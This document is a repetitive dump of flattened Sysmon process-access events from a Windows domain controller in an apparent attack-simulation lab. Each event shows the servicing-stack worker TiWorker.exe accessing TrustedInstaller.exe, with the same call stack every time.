13:30:30.560{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.560{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.560{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.545{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.545{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.545{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.545{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.545{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.529{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.529{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.529{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.529{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.529{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.529{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.513{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.513{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.513{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.513{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 